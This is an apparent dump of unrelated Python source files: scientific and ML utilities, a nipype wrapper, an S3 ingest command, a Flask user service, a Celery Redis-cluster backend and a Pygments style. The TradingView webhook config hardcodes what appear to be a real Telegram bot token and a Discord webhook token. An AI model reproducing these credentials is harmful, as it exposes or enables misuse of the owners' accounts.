ext | sha | content
---|---|---|
py | b4102e5d87481ffee07f75e6ffccb663e0faf5fd | import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 128 , FREQ = 'D', seed = 0, trendtype = "MovingAverage", cycle_length = 12, transform = "Quantization", sigma = 0.0, exog_count = 0, ar_order = 12); |
py | b4102e8edea7d4593769dedac3ad42261569f112 | # -*- coding: utf-8 -*-
# -*- coding: utf8 -*-
"""Autogenerated file - DO NOT EDIT
If you spot a bug, please report it on the mailing list and/or change the generator."""
from nipype.interfaces.base import CommandLine, CommandLineInputSpec, SEMLikeCommandLine, TraitedSpec, File, Directory, traits, isdefined, InputMultiPath, OutputMultiPath
import os
class N4ITKBiasFieldCorrectionInputSpec(CommandLineInputSpec):
inputimage = File(desc="Input image where you observe signal inhomogeneity", exists=True, argstr="--inputimage %s")
maskimage = File(desc="Binary mask that defines the structure of your interest. NOTE: This parameter is OPTIONAL. If the mask is not specified, the module will use internally Otsu thresholding to define this mask. Better processing results can often be obtained when a meaningful mask is defined.", exists=True, argstr="--maskimage %s")
outputimage = traits.Either(traits.Bool, File(), hash_files=False, desc="Result of processing", argstr="--outputimage %s")
outputbiasfield = traits.Either(traits.Bool, File(), hash_files=False, desc="Recovered bias field (OPTIONAL)", argstr="--outputbiasfield %s")
iterations = InputMultiPath(traits.Int, desc="Maximum number of iterations at each level of resolution. Larger values will increase execution time, but may lead to better results.", sep=",", argstr="--iterations %s")
convergencethreshold = traits.Float(desc="Stopping criterion for the iterative bias estimation. Larger values will lead to smaller execution time.", argstr="--convergencethreshold %f")
meshresolution = InputMultiPath(traits.Float, desc="Resolution of the initial bspline grid defined as a sequence of three numbers. The actual resolution will be defined by adding the bspline order (default is 3) to the resolution in each dimension specified here. For example, 1,1,1 will result in a 4x4x4 grid of control points. This parameter may need to be adjusted based on your input image. In the multi-resolution N4 framework, the resolution of the bspline grid at subsequent iterations will be doubled. The number of resolutions is implicitly defined by Number of iterations parameter (the size of this list is the number of resolutions)", sep=",", argstr="--meshresolution %s")
splinedistance = traits.Float(desc="An alternative means to define the spline grid, by setting the distance between the control points. This parameter is used only if the grid resolution is not specified.", argstr="--splinedistance %f")
shrinkfactor = traits.Int(desc="Defines how much the image should be upsampled before estimating the inhomogeneity field. Increase if you want to reduce the execution time. 1 corresponds to the original resolution. Larger values will significantly reduce the computation time.", argstr="--shrinkfactor %d")
bsplineorder = traits.Int(desc="Order of B-spline used in the approximation. Larger values will lead to longer execution times, may result in overfitting and poor result.", argstr="--bsplineorder %d")
weightimage = File(desc="Weight Image", exists=True, argstr="--weightimage %s")
histogramsharpening = InputMultiPath(traits.Float, desc="A vector of up to three values. Non-zero values correspond to Bias Field Full Width at Half Maximum, Wiener filter noise, and Number of histogram bins.", sep=",", argstr="--histogramsharpening %s")
class N4ITKBiasFieldCorrectionOutputSpec(TraitedSpec):
outputimage = File(desc="Result of processing", exists=True)
outputbiasfield = File(desc="Recovered bias field (OPTIONAL)", exists=True)
class N4ITKBiasFieldCorrection(SEMLikeCommandLine):
"""title: N4ITK MRI Bias correction
category: Filtering
description: Performs image bias correction using N4 algorithm. This module is based on the ITK filters contributed in the following publication: Tustison N, Gee J "N4ITK: Nick's N3 ITK Implementation For MRI Bias Field Correction", The Insight Journal 2009 January-June, http://hdl.handle.net/10380/3053
version: 9
documentation-url: http://wiki.slicer.org/slicerWiki/index.php/Documentation/4.1/Modules/N4ITKBiasFieldCorrection
contributor: Nick Tustison (UPenn), Andrey Fedorov (SPL, BWH), Ron Kikinis (SPL, BWH)
acknowledgements: The development of this module was partially supported by NIH grants R01 AA016748-01, R01 CA111288 and U01 CA151261 as well as by NA-MIC, NAC, NCIGT and the Slicer community.
"""
input_spec = N4ITKBiasFieldCorrectionInputSpec
output_spec = N4ITKBiasFieldCorrectionOutputSpec
_cmd = "N4ITKBiasFieldCorrection "
_outputs_filenames = {'outputimage': 'outputimage.nii', 'outputbiasfield': 'outputbiasfield.nii'}
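# --- Editor's illustrative sketch (not part of the autogenerated interface file) ---------
# Shows the usual nipype pattern for driving this SEM-like CLI wrapper: set inputs,
# inspect the generated command line, and optionally run it. The temporary file below only
# exists so that the File(exists=True) trait validation passes; a real call would point at
# an actual NIfTI volume, and running it requires the Slicer CLI module to be on PATH.
if __name__ == "__main__":
    import tempfile
    placeholder = tempfile.NamedTemporaryFile(suffix=".nii", delete=False)
    placeholder.close()
    n4 = N4ITKBiasFieldCorrection()
    n4.inputs.inputimage = placeholder.name
    n4.inputs.outputimage = "corrected.nii"
    print(n4.cmdline)  # e.g. "N4ITKBiasFieldCorrection --inputimage /tmp/... --outputimage corrected.nii"
    # n4.run()  # uncomment only if the Slicer N4ITKBiasFieldCorrection executable is installed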
|
py | b4102f739ab0982775634b415124b1136fa35294 | #!/usr/bin/env python
from numpy import (zeros, ones, finfo, inf, argmax)
from scipy.sparse.linalg import (norm, lsqr)
from scipy.sparse._sparsetools import (csr_matvec, csc_matvec)
def sparse_nnls(C, d, tol=-1, itmax_factor=3):
""" Calculate argmin ||Cx - d||_2 subject to x >= 0 when C is sparse
Parameters are:
C is a scipy.sparse matrix of size m by n
d is an ndarray of size m or scipy.sparse matrix of size m by 1
tol: tolerance (optional)
itmax_factor: factor to determine maximum iterations allowed (optional)
Returns:
x: an ndarray that minimizes ||Cx - d||_2 subject to x >= 0
"""
C = C.tocsc()
# Set the tolerance
m, n = C.shape
tol = 10 * finfo(float).eps * norm(C, 1) * (max(C.shape) + 1) if tol == -1 else tol
itmax = itmax_factor * n
# Initialize vector of n zeros and Infs (to be used later)
wz = zeros(n)
# Initialize set of non-active columns to null
P = zeros(n, dtype=bool)
# Initialize set of active columns to all and the initial point to zeros
Z = ones(n, dtype=bool)
x = zeros(n)
Ctrans = C.T # transpose c
dtemp = d # copy of d
# resid = d - C*x
resid = -dtemp
csc_matvec(m, n, C.indptr, C.indices, C.data, x, resid)
resid = -resid
# w = Ctrans*resid
w = zeros(n)
csr_matvec(n, m, Ctrans.indptr, Ctrans.indices, Ctrans.data, resid, w)
# Set up iteration criteria
outeriter = 0
i = 0
# Outer loop to put variables into set to hold positive coefficients
while any(Z) and any(w[Z] > tol):
# print(f"On iteration {outeriter}\n")
outeriter += 1
# Reset intermediate solution z
z = zeros(n)
# Create wz, a Lagrange multiplier vector of variables in the zero set.
# wz must have the same size as w to preserve the correct indices, so
# set multipliers to -Inf for variables outside of the zero set.
wz[P] = -inf
wz[Z] = w[Z]
# Find variable with largest Lagrange multiplier
t = argmax(wz)
# Move variable t from zero set to positive set
P[t] = True
Z[t] = False
# Compute intermediate solution using only variables in positive set
z[P] = lsqr(C[:, [i for i, e in enumerate(P) if e]], d)[0]
# inner loop to remove elements from the positive set which no longer belong
while any(z[P] <= 0):
# print("Entering inner loop\n")
i += 1
if i > itmax:
print("sparse_nnls:IterationCountExceeded")
x = z
return x
# Find indices where intermediate solution z is approximately negative
Q = (z <= 0) & P
# Choose new x subject to keeping new x nonnegative
alpha = min(x[Q] / (x[Q] - z[Q]))
x = x + alpha * (z - x)
# Reset Z and P given intermediate values of x
Z = ((abs(x) < tol) & P) | Z
P = ~Z
z = zeros(n) # Reset z
z[P] = lsqr(C[:, [i for i, e in enumerate(P) if e]], d)[0] # Re-solve for z
x = z
# resid = d - C*x
resid = -dtemp
csc_matvec(m, n, C.indptr, C.indices, C.data, x, resid)
resid = -resid
# w = Ctrans*resid
w = zeros(n)
csr_matvec(n, m, Ctrans.indptr, Ctrans.indices, Ctrans.data, resid, w)
return x
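# --- Editor's illustrative sketch (not part of the original module) ----------------------
# Exercises sparse_nnls on a tiny problem whose unconstrained least-squares solution has a
# negative component, so the nonnegativity constraint is actually active.
if __name__ == '__main__':
    import numpy as np
    from scipy.sparse import csc_matrix
    C_demo = csc_matrix(np.array([[1.0, 0.0],
                                  [0.0, 2.0],
                                  [1.0, 1.0]]))
    d_demo = np.array([1.0, -2.0, 0.5])
    x_demo = sparse_nnls(C_demo, d_demo)
    print(x_demo)                      # expected: roughly [0.75, 0.0]
    assert (x_demo >= 0).all()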
|
py | b4102f8153bfdfdada145061f06b4803577b5415 | #! /usr/bin/python
# -*- encoding: utf-8 -*-
# Adapted from https://github.com/wujiyang/Face_Pytorch (Apache License)
import torch
import torch.nn as nn
import torch.nn.functional as F
import time, pdb, numpy, math
from utils import accuracy
class LossFunction(nn.Module):
def __init__(self, nOut, nClasses, margin=0.3, scale=15, easy_margin=False, **kwargs):
super(LossFunction, self).__init__()
self.test_normalize = True
self.m = margin
self.s = scale
self.in_feats = nOut
self.weight = torch.nn.Parameter(torch.FloatTensor(nClasses, nOut), requires_grad=True)
self.ce = nn.CrossEntropyLoss()
nn.init.xavier_normal_(self.weight, gain=1)
self.easy_margin = easy_margin
self.cos_m = math.cos(self.m)
self.sin_m = math.sin(self.m)
# make cos(theta + m) monotonically decreasing for theta in [0°, 180°]
self.th = math.cos(math.pi - self.m)
self.mm = math.sin(math.pi - self.m) * self.m
print('Initialised AAMSoftmax margin %.3f scale %.3f'%(self.m,self.s))
def forward(self, x, label=None):
assert x.size()[0] == label.size()[0]
assert x.size()[1] == self.in_feats
# cos(theta)
cosine = F.linear(F.normalize(x), F.normalize(self.weight))
# cos(theta + m)
sine = torch.sqrt((1.0 - torch.mul(cosine, cosine)).clamp(0, 1))
phi = cosine * self.cos_m - sine * self.sin_m
if self.easy_margin:
phi = torch.where(cosine > 0, phi, cosine)
else:
phi = torch.where((cosine - self.th) > 0, phi, cosine - self.mm)
#one_hot = torch.zeros(cosine.size(), device='cuda' if torch.cuda.is_available() else 'cpu')
one_hot = torch.zeros_like(cosine)
one_hot.scatter_(1, label.view(-1, 1), 1)
output = (one_hot * phi) + ((1.0 - one_hot) * cosine)
output = output * self.s
loss = self.ce(output, label)
prec1 = accuracy(output.detach(), label.detach(), topk=(1,))[0]
return loss, prec1 |
py | b4102fff3d62752199a90314e215c2579fa87daa | class DynamicSearchException(Exception):
"""
Base exception for the app.
"""
|
py | b4103069085a1f4bd3f6da6094da4a57a24c1744 | from pymongo import MongoClient
import json
with open('auth.json') as f:
auth_info = json.load(f)
mongoInfo = auth_info['mongo']
client = MongoClient('mongodb+srv://' + mongoInfo['username'] + ':' + mongoInfo['password'] + '@' + mongoInfo['server'] + '/tweets')  # '@' separator added; assumes the 'server' field stores only the host name
db = client['tweets']
db['tweets'].drop() |
py | b4103079840afea6ef491d944bfd2411efd95cb8 | # ----------------------------------------------- #
# Plugin Name : TradingView-Webhook-Bot #
# Author Name : fabston #
# File Name : config.py #
# ----------------------------------------------- #
# TradingView Example Alert Message:
# {
# "key":"9T2q394M90", "telegram":"-1001298977502", "discord":"789842349670960670/BFeBBrCt-w2Z9RJ2wlH6TWUjM5bJuC29aJaJ5OQv9sE6zCKY_AlOxxFwRURkgEl852s3", "msg":"Long #{{ticker}} at `{{close}}`"
# }
sec_key = (
"9T2q394M90" # Can be anything. Has to match with "key" in your TradingView alert message
)
# Telegram Settings
send_telegram_alerts = True
tg_token = "5120063835:AAEGneHSMn0t8MvDZeJqKlAwk_P4gDIQi6w" # Bot token. Get it from @Botfather
channel = -1649898601 # Channel ID (ex. -1001487568087)
# Discord Settings
send_discord_alerts = False
discord_webhook = "" # Discord Webhook URL (https://support.discordapp.com/hc/de/articles/228383668-Webhooks-verwenden)
# Slack Settings
send_slack_alerts = False
slack_webhook = "" # Slack Webhook URL (https://api.slack.com/messaging/webhooks)
# Twitter Settings
send_twitter_alerts = False
tw_ckey = ""
tw_csecret = ""
tw_atoken = ""
tw_asecret = ""
# Email Settings
send_email_alerts = False
email_sender = "" # Your email address
email_receivers = ["", ""] # Receivers, can be multiple
email_subject = "Trade Alert!"
email_port = 465 # SMTP SSL Port (ex. 465)
email_host = "" # SMTP host (ex. smtp.gmail.com)
email_user = "" # SMTP Login credentials
email_password = "" # SMTP Login credentials
|
py | b41030d95ea913d049366e1a7b2b490646a644a7 | # Copyright 2019 The FastEstimator Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from typing import Iterable, Optional, Union
from albumentations import BboxParams, KeypointParams
from albumentations.augmentations.transforms import Crop as CropAlb
from fastestimator.op.numpyop.multivariate.multivariate import MultiVariateAlbumentation
from fastestimator.util.traceability_util import traceable
@traceable()
class Crop(MultiVariateAlbumentation):
"""Crop a region from the input.
Args:
mode: What mode(s) to execute this Op in. For example, "train", "eval", "test", or "infer". To execute
regardless of mode, pass None. To execute in all modes except for a particular one, you can pass an argument
like "!infer" or "!train".
ds_id: What dataset id(s) to execute this Op in. To execute regardless of ds_id, pass None. To execute in all
ds_ids except for a particular one, you can pass an argument like "!ds1".
image_in: The key of an image to be modified.
mask_in: The key of a mask to be modified (with the same random factors as the image).
masks_in: The key of masks to be modified (with the same random factors as the image).
bbox_in: The key of a bounding box(es) to be modified (with the same random factors as the image).
keypoints_in: The key of keypoints to be modified (with the same random factors as the image).
image_out: The key to write the modified image (defaults to `image_in` if None).
mask_out: The key to write the modified mask (defaults to `mask_in` if None).
masks_out: The key to write the modified masks (defaults to `masks_in` if None).
bbox_out: The key to write the modified bounding box(es) (defaults to `bbox_in` if None).
keypoints_out: The key to write the modified keypoints (defaults to `keypoints_in` if None).
bbox_params: Parameters defining the type of bounding box ('coco', 'pascal_voc', 'albumentations' or 'yolo').
keypoint_params: Parameters defining the type of keypoints ('xy', 'yx', 'xya', 'xys', 'xyas', 'xysa').
x_min: Minimum upper left x coordinate.
y_min: Minimum upper left y coordinate.
x_max: Maximum lower right x coordinate.
y_max: Maximum lower right y coordinate.
Image types:
uint8, float32
"""
def __init__(self,
x_min: int = 0,
y_min: int = 0,
x_max: int = 1024,
y_max: int = 1024,
mode: Union[None, str, Iterable[str]] = None,
ds_id: Union[None, str, Iterable[str]] = None,
image_in: Optional[str] = None,
mask_in: Optional[str] = None,
masks_in: Optional[str] = None,
bbox_in: Optional[str] = None,
keypoints_in: Optional[str] = None,
image_out: Optional[str] = None,
mask_out: Optional[str] = None,
masks_out: Optional[str] = None,
bbox_out: Optional[str] = None,
keypoints_out: Optional[str] = None,
bbox_params: Union[BboxParams, str, None] = None,
keypoint_params: Union[KeypointParams, str, None] = None):
super().__init__(CropAlb(x_min=x_min, y_min=y_min, x_max=x_max, y_max=y_max, always_apply=True),
image_in=image_in,
mask_in=mask_in,
masks_in=masks_in,
bbox_in=bbox_in,
keypoints_in=keypoints_in,
image_out=image_out,
mask_out=mask_out,
masks_out=masks_out,
bbox_out=bbox_out,
keypoints_out=keypoints_out,
bbox_params=bbox_params,
keypoint_params=keypoint_params,
mode=mode,
ds_id=ds_id)
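# --- Editor's illustrative sketch (not part of the original FastEstimator source) --------
# A minimal Pipeline wiring for this Op. The import paths, key names, and get_results()
# usage are best-effort assumptions from the public FastEstimator API, not taken from this
# file; treat this as a hedged sketch rather than canonical usage.
if __name__ == "__main__":
    import numpy as np
    import fastestimator as fe
    from fastestimator.dataset.numpy_dataset import NumpyDataset
    train_ds = NumpyDataset({"image": np.random.randint(0, 255, size=(4, 512, 512, 3), dtype=np.uint8)})
    pipeline = fe.Pipeline(train_data=train_ds,
                           batch_size=2,
                           ops=[Crop(x_min=0, y_min=0, x_max=256, y_max=256, image_in="image")])
    batch = pipeline.get_results()
    print(batch["image"].shape)  # expected: (2, 256, 256, 3)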
|
py | b41030e6ff11886ce80f2ab2a6ebd40020d41daa | import sys
from simplecoremidi import MIDISource
from musi import play, countdown
try:
input = __builtins__.raw_input
except AttributeError:
pass
def main(args):
if not args[1:]:
print "Usage runner.py <song.py>"
return 1
mod = args[1]
m = __import__(mod, globals(), locals(), ['x'])
source = MIDISource("musi emitter")
send_midi = source.send
countdown()
while True:
m = reload(m)
song = m.song
print "Playing."
try:
play(song, send_midi)
except KeyboardInterrupt:
print "Interrupted. Hit enter."
input()
if __name__=='__main__':
sys.exit(main(sys.argv))
|
py | b4103169967f7d0d2663bab34d648e2cc87e6c6e | import multiprocessing
import re
from typing import Generator, Optional
import boto3
import botocore
import djclick as click
from . import _data_helper as helper
def _iter_matching_objects(
s3_client,
bucket: str,
prefix: str,
include_regex: str,
exclude_regex: str,
) -> Generator[dict, None, None]:
paginator = s3_client.get_paginator('list_objects_v2')
page_iter = paginator.paginate(Bucket=bucket, Prefix=prefix)
include_pattern = re.compile(include_regex)
exclude_pattern = re.compile(exclude_regex)
for page in page_iter:
for obj in page['Contents']:
if include_pattern.match(obj['Key']) and not exclude_pattern.search(obj['Key']):
yield obj
class Loader:
def __init__(self, bucket: str, region: str, google: bool = False):
self.bucket = bucket
self.google = google
self.region = region
def _format_url(self, base_url):
if self.google:
return f'http://storage.googleapis.com/{base_url}'
return f'https://{self.region}.amazonaws.com/{base_url}'
def load_object(self, obj: dict) -> None:
key = obj['Key']
url = self._format_url(f'{self.bucket}/{key}')
helper._get_or_create_checksum_file_url(url, name=key)
@click.command()
@click.argument('bucket')
@click.option('--include-regex', default='')
@click.option('--exclude-regex', default='')
@click.option('--prefix', default='')
@click.option('--region', default='us-east-1')
@click.option('--access-key-id')
@click.option('--secret-access-key')
@click.option('--google', is_flag=True, default=False)
def ingest_s3(
bucket: str,
include_regex: str,
exclude_regex: str,
prefix: str,
region: str,
access_key_id: Optional[str],
secret_access_key: Optional[str],
google: bool,
) -> None:
if access_key_id and secret_access_key:
boto3_params = {
'aws_access_key_id': access_key_id,
'aws_secret_access_key': secret_access_key,
'config': botocore.client.Config(signature_version='s3v4', region_name=region),
}
else:
boto3_params = {
'config': botocore.client.Config(
signature_version=botocore.UNSIGNED, region_name=region
)
}
if google: # Google Cloud Storage
boto3_params['endpoint_url'] = 'https://storage.googleapis.com'
s3_client = boto3.client('s3', **boto3_params)
loader = Loader(bucket, region, google=google)
pool = multiprocessing.Pool(multiprocessing.cpu_count())
pool.map(
loader.load_object,
_iter_matching_objects(s3_client, bucket, prefix, include_regex, exclude_regex),
)
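# Editor's note (hedged): djclick exposes this module as a Django management command whose
# name comes from the file name under <app>/management/commands/. Assuming the file is
# saved as ingest_s3.py, a public-bucket ingest might look like:
#   python manage.py ingest_s3 my-bucket --prefix rasters/ --include-regex '.*\.tif$'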
|
py | b41031c08476cf8f7aff25809ca677c95d3ae196 | from .context_manager import nullcontext
from .raise_error import raise_if_kwargs
from .tqdm import tqdm
from .progbar import Progbar
from .misc import *
from .logger import setup_logger, get_logger
from .timeout import TimeOut
|
py | b4103243d8ad8ea9d93b6e47ed460637a2f97cb3 | from api.extensions import db, ma
from api.models.Projects import Project
from api.models.ProjectMembers import ProjectMember
from api.models.Team import Team
from api.models.User import User
from api.serializers.user import UserSchema
from api.serializers.project import ProjectSchema
from api.serializers.team import TeamSchema
user_schema = UserSchema()
users_schema = UserSchema(many=True)
project_schema = ProjectSchema()
team_schema = TeamSchema()
def to_json(user):
"""
Returns a user JSON object
"""
user_detail = user_schema.dump(user).data
data = get_data(user_detail["id"])
user_detail["all_teams"] = data["all_teams"]
user_detail["all_projects"] = data["all_projects"]
return user_detail
def find_by_email(email):
"""
query user on their email
"""
return User.query.filter_by(email=email).first()
def find_by_user_id(_id):
"""
query user on their id
"""
user = User.query.filter_by(id=_id).first()
return user_schema.dump(user).data
def find_by_username(username):
"""
query user on their username
"""
user = User.query.filter_by(username=username).first()
return user_schema.dump(user).data
def delete_by_id(_id):
"""
Delete user by their id
"""
User.query.filter_by(id=_id).delete()
db.session.commit()
def delete_by_email(email):
"""
Delete user by their email
"""
User.query.filter_by(email=email).delete()
db.session.commit()
def update_by_id(user_id, data):
"""
update user by its id
"""
user = User.query.get(user_id)
user.username = data['username']
db.session.commit()
return user_schema.dump(user).data
def get_data(user_id):
"""
get all the projects and the teams of a user
"""
all_projects = []
all_teams = []
queries = db.session.query(
User, ProjectMember, Team, Project
).join(
ProjectMember, User.id == ProjectMember.user_id
).join(
Team, ProjectMember.team_id == Team.id
).join(
Project, Team.project_id == Project.id
).filter(
User.id == user_id
)
for project in queries:
all_projects.append(project_schema.dump(project.Project).data)
for team in queries:
all_teams.append(team_schema.dump(team.Team).data)
return {"all_projects": all_projects,
"all_teams": all_teams}
def get_user_roles(user_id, project_id):
"""
get all the roles of a user in a project
"""
all_roles = []
queries = db.session.query(
User, ProjectMember, Team, Project
).join(
ProjectMember, User.id == ProjectMember.user_id
).join(
Team, ProjectMember.team_id == Team.id
).join(
Project, Team.project_id == Project.id
).filter(
User.id == user_id,
Project.id == project_id
)
for team in queries:
all_roles.append(team_schema.dump(team.Team).data["role"])
return all_roles
def get_teams_of_user_in_project(user_id, project_id):
"""
get all the teams of the user in a project
"""
all_team_ids = []
queries = db.session.query(
User, ProjectMember, Team, Project
).join(
ProjectMember, User.id == ProjectMember.user_id
).join(
Team, ProjectMember.team_id == Team.id
).join(
Project, Team.project_id == Project.id
).filter(
User.id == user_id,
Project.id == project_id
)
for team in queries:
all_team_ids.append(team_schema.dump(team.Team).data["id"])
return all_team_ids
def get_projectmembers(project_id):
"""
get the project members of a project
"""
all_members = []
queries = db.session.query(
Project, Team, ProjectMember, User
).join(
Team, Project.id == Team.project_id
).join(
ProjectMember, Team.id == ProjectMember.team_id
).join(
User, ProjectMember.user_id == User.id
).filter(
Project.id == project_id
)
for member in queries:
team_id = team_schema.dump(member.Team).data["id"]
team_role = team_schema.dump(member.Team).data["role"]
team_name = team_schema.dump(member.Team).data["team_name"]
project_id = team_schema.dump(member.Team).data["project_id"]
name = user_schema.dump(member.User).data["name"]
email = user_schema.dump(member.User).data["email"]
data = {
"team_id": team_id,
"team_role": team_role,
"team_name": team_name,
"project_id": project_id,
"name": name,
"email": email
}
all_members.append(data)
return all_members
def save(user):
"""
Save a user to the database.
This includes creating a new user and editing one.
"""
db.session.add(user)
db.session.commit()
user_detail = user_schema.dump(user).data
data = get_data(user_detail["id"])
user_detail["all_teams"] = data["all_teams"]
user_detail["all_projects"] = data["all_projects"]
return user_detail
def search_user(email_query):
"""
search user on their email
"""
search = "%{}%".format(email_query)
users = User.query.filter(User.email.like(search)).all()
return users_schema.dump(users).data |
py | b41034f224577793dde0c1916d9c08f90cc42dc5 | # -*- coding: utf-8 -*-
"""
celery.backends.rediscluster
~~~~~~~~~~~~~~~~~~~~~
Redis cluster result store backend.
CELERY_REDIS_CLUSTER_SETTINGS = {
    'startup_nodes': [{"host": "127.0.0.1", "port": "6379"}]
}
"""
from __future__ import absolute_import
from functools import partial
from kombu.utils import cached_property, retry_over_time
from celery import states
from celery.canvas import maybe_signature
from celery.exceptions import ChordError, ImproperlyConfigured
from celery.utils.serialization import strtobool
from celery.utils.log import get_logger
from celery.utils.time import humanize_seconds
from celery.backends.base import KeyValueStoreBackend
# try:
from rediscluster.client import RedisCluster
# from kombu.transport.redis import get_redis_error_classes
# except ImportError: # pragma: no cover
# RedisCluster = None # noqa
# ConnectionError = None # noqa
get_redis_error_classes = None # noqa
__all__ = ['RedisClusterBackend']
REDIS_MISSING = """\
You need to install the redis-py-cluster library in order to use \
the Redis result store backend."""
logger = get_logger(__name__)
error = logger.error
class RedisClusterBackend(KeyValueStoreBackend):
"""Redis task result store."""
#: redis client module.
redis = RedisCluster
startup_nodes = None
max_connections = None
init_slot_cache = True
supports_autoexpire = True
supports_native_join = True
implements_incr = True
def __init__(self, *args, **kwargs):
super(RedisClusterBackend, self).__init__(expires_type=int, **kwargs)
conf = self.app.conf
if self.redis is None:
raise ImproperlyConfigured(REDIS_MISSING)
# For compatibility with the old REDIS_* configuration keys.
def _get(key):
for prefix in 'CELERY_REDIS_{0}', 'REDIS_{0}':
try:
return conf[prefix.format(key)]
except KeyError:
pass
self.conn_params = self.app.conf.get('CELERY_REDIS_CLUSTER_SETTINGS', {
'startup_nodes': [{'host': _get('HOST') or 'localhost', 'port': _get('PORT') or 6379}]
})
if self.conn_params is not None:
if not isinstance(self.conn_params, dict):
raise ImproperlyConfigured(
'RedisCluster backend settings should be grouped in a dict')
try:
new_join = strtobool(self.conn_params.pop('new_join'))
if new_join:
self.apply_chord = self._new_chord_apply
self.on_chord_part_return = self._new_chord_return
except KeyError:
pass
self.expires = self.prepare_expires(None, type=int)
self.connection_errors, self.channel_errors = (
get_redis_error_classes() if get_redis_error_classes
else ((), ()))
def get(self, key):
return self.client.get(key)
def mget(self, keys):
return self.client.mget(keys)
def ensure(self, fun, args, **policy):
retry_policy = dict(self.retry_policy, **policy)
max_retries = retry_policy.get('max_retries')
return retry_over_time(
fun, self.connection_errors, args, {},
partial(self.on_connection_error, max_retries),
**retry_policy
)
def on_connection_error(self, max_retries, exc, intervals, retries):
tts = next(intervals)
error('Connection to Redis lost: Retry (%s/%s) %s.',
retries, max_retries or 'Inf',
humanize_seconds(tts, 'in '))
return tts
def set(self, key, value, **retry_policy):
return self.ensure(self._set, (key, value), **retry_policy)
def _set(self, key, value):
if hasattr(self, 'expires'):
self.client.setex(key, value, self.expires)
else:
self.client.set(key, value)
def delete(self, key):
self.client.delete(key)
def incr(self, key):
return self.client.incr(key)
def expire(self, key, value):
return self.client.expire(key, value)
def add_to_chord(self, group_id, result):
self.client.incr(self.get_key_for_group(group_id, '.t'), 1)
def _unpack_chord_result(self, tup, decode,
EXCEPTION_STATES=states.EXCEPTION_STATES,
PROPAGATE_STATES=states.PROPAGATE_STATES):
_, tid, state, retval = decode(tup)
if state in EXCEPTION_STATES:
retval = self.exception_to_python(retval)
if state in PROPAGATE_STATES:
raise ChordError('Dependency {0} raised {1!r}'.format(tid, retval))
return retval
def _new_chord_apply(self, header, partial_args, group_id, body,
result=None, options={}, **kwargs):
# avoids saving the group in the redis db.
options['task_id'] = group_id
return header(*partial_args, **options or {})
def _new_chord_return(self, task, state, result, propagate=None,
PROPAGATE_STATES=states.PROPAGATE_STATES):
app = self.app
if propagate is None:
propagate = self.app.conf.CELERY_CHORD_PROPAGATES
request = task.request
tid, gid = request.id, request.group
if not gid or not tid:
return
client = self.client
jkey = self.get_key_for_group(gid, '.j')
tkey = self.get_key_for_group(gid, '.t')
result = self.encode_result(result, state)
_, readycount, totaldiff, _, _ = client.pipeline() \
.rpush(jkey, self.encode([1, tid, state, result])) \
.llen(jkey) \
.get(tkey) \
.expire(jkey, 86400) \
.expire(tkey, 86400) \
.execute()
totaldiff = int(totaldiff or 0)
try:
callback = maybe_signature(request.chord, app=app)
total = callback['chord_size'] + totaldiff
if readycount == total:
decode, unpack = self.decode, self._unpack_chord_result
resl, _, _ = client.pipeline() \
.lrange(jkey, 0, total) \
.delete(jkey) \
.delete(tkey) \
.execute()
try:
callback.delay([unpack(tup, decode) for tup in resl])
except Exception as exc:
error('Chord callback for %r raised: %r',
request.group, exc, exc_info=1)
app._tasks[callback.task].backend.fail_from_current_stack(
callback.id,
exc=ChordError('Callback error: {0!r}'.format(exc)),
)
except ChordError as exc:
error('Chord %r raised: %r', request.group, exc, exc_info=1)
app._tasks[callback.task].backend.fail_from_current_stack(
callback.id, exc=exc,
)
except Exception as exc:
error('Chord %r raised: %r', request.group, exc, exc_info=1)
app._tasks[callback.task].backend.fail_from_current_stack(
callback.id, exc=ChordError('Join error: {0!r}'.format(exc)),
)
@cached_property
def client(self):
return RedisCluster(**self.conn_params)
def __reduce__(self, args=(), kwargs={}):
return super(RedisClusterBackend, self).__reduce__(
(self.conn_params['startup_nodes'], ), {'expires': self.expires},
)
if __name__ == '__main__':
from celery import Celery
class Config:
CELERY_ENABLE_UTC = True
CELERY_TIMEZONE = 'Europe/Istanbul'
CELERY_REDIS_CLUSTER_SETTINGS = {'startup_nodes': [
{"host": "195.175.249.97", "port": "6379"},
{"host": "195.175.249.98", "port": "6379"},
{"host": "195.175.249.99", "port": "6380"}
]}
app = Celery()
app.config_from_object(Config)
rb = RedisClusterBackend(app=app)
rb.set('a', 'b1')
print(rb.get('a'))
|
py | b410362334cf83f51a3576c2d184f114183694a5 | # -*- coding: utf-8 -*-
"""
pygments.styles.paraiso_light
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Paraíso (Light) by Jan T. Sott
Pygments template by Jan T. Sott (https://github.com/idleberg)
Created with Base16 Builder by Chris Kempson
(https://github.com/chriskempson/base16-builder).
:copyright: Copyright 2006-2017 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, Text, \
Number, Operator, Generic, Whitespace, Punctuation, Other, Literal
BACKGROUND = "#e7e9db"
CURRENT_LINE = "#b9b6b0"
SELECTION = "#a39e9b"
FOREGROUND = "#2f1e2e"
COMMENT = "#8d8687"
RED = "#ef6155"
ORANGE = "#f99b15"
YELLOW = "#fec418"
GREEN = "#48b685"
AQUA = "#5bc4bf"
BLUE = "#06b6ef"
PURPLE = "#815ba4"
class ParaisoLightStyle(Style):
default_style = ''
background_color = BACKGROUND
highlight_color = SELECTION
styles = {
# No corresponding class for the following:
Text: FOREGROUND, # class: ''
Whitespace: "", # class: 'w'
Error: RED, # class: 'err'
Other: "", # class 'x'
Comment: COMMENT, # class: 'c'
Comment.Multiline: "", # class: 'cm'
Comment.Preproc: "", # class: 'cp'
Comment.Single: "", # class: 'c1'
Comment.Special: "", # class: 'cs'
Keyword: PURPLE, # class: 'k'
Keyword.Constant: "", # class: 'kc'
Keyword.Declaration: "", # class: 'kd'
Keyword.Namespace: AQUA, # class: 'kn'
Keyword.Pseudo: "", # class: 'kp'
Keyword.Reserved: "", # class: 'kr'
